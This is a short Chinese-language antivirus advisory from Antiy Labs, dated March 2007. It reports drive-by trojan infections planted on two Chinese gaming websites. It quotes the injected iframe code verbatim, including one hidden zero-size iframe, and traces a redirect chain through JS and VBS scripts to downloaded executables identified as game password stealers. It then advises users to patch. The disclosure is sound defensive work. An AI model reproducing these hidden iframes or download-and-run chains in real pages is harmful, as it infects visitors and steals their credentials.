|
2007-3-26清晨,安天实验室反病毒监测中心发现“中国娱乐网(game.yule.com.cn)”
和“就爱外挂网”(http://www.92wg.com)被植入木马病毒.当用户浏览该网站时将被病毒
感染。
中国娱乐网(game.yule.com.cn)网站首页代码中被加入如下代码:
<iframe src="http://www.easysea.com/yule_allyes/120_60.htm" width="120" height="60" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
把浏览者带入到http://www.easysea.com/yule_allyes/120_60.htm并跳入http://www.erong.com/
此地址原文件内容包括:http://www.cnfish.com/htmledit/Include/md5.asp?ad=1
此页面调用一个JS文件,这个JS文件会让用户隐蔽下载并运行http://sf.sf325.com/go/run.vbs
VBS脚本会自动下载http://www.o1sf.com/oh/dm.exe
“就爱外挂网”(http://www.92wg.com)
该站点日访问量较大,因此病毒会引起受感染者被远程控制,因此危害性较大,该站点受页被嵌入标识语言HTML代码<iframe src="http://www.37ip.net/123.htm" name="zhu" width="0" height="0" frameborder="0">,以至让浏览者正常访问的情况下同时隐蔽打开http://www.37ip.net/123.htm。该页面所运行的xiaoH.htm页面带有危害性,让未打补丁的用户针对http://www.37ip.net/wmb.exe文件下载并运行。运行后会从网站上下载如下文件并运行
http://www.37ip.net/xzz/1.exe 病毒名:Trojan-PSW.Win32.OnLineGames.es
http://www.37ip.net/xzz/2.exe 病毒名:Trojan-PSW.Win32.OnLineGames.es
http://www.37ip.net/xzz/3.exe 病毒名:Trojan-PSW.Win32.Lmir.biq
http://www.37ip.net/xzz/4.exe 病毒名:Trojan-PSW.Win32.OnLineGames.im
http://www.37ip.net/xzz/5.exe 病毒名:Trojan-PSW.Win32.OnLineGames.im
http://www.37ip.net/xzz/6.exe 病毒名:Trojan-PSW.Win32.OnLineGames.jj
安天实验室提醒广大用户:请广大用户及时通过使用微软自动更新服务或在微软更新
网站上下载更新程序的方式,安装该漏洞的补丁.安天实验室为了方便广大木马防线用户,
已经在木马防线2005+中,提供了这些更新程序的下载链接,请用户及时下载并升级您的
木马防线,保护系统的安全。
|
内容:
病毒上报信箱: